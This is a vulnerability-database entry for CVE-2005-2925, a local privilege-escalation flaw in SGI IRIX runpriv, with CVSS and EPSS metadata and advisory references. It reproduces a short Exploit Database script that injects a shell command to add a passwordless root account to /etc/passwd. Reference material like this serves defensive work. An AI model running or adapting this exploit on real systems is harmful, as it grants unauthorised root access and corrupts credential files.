CVE-2005-2925 : Detail

CVE-2005-2925

0.04%V3
Local
2005-10-11
02h00 +00:00
2018-10-19
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

runpriv in SGI IRIX allows local users to bypass intended restrictions and execute arbitrary commands via shell metacharacters in a command line for a privileged binary in /usr/sysadm/privbin.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1577

Publication date : 2005-10-09 22h00 +00:00
Author : anonymous
EDB Verified : Yes

#!/bin/sh # Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312 /usr/sysadm/bin/runpriv mountfs -s test -d / -o | "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" su r00t -c "chown root:sys /tmp/passwd123 ; mv /tmp/passwd123 /etc/passwd ; chmod 644 /etc/passwd ; su" # milw0rm.com [2005-10-10]

Products Mentioned

Configuraton 0

Sgi>>Irix >> Version 6.5.22

References

http://securitytracker.com/id?1015031
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/17131
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/19907
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/15055
Tags : vdb-entry, x_refsource_BID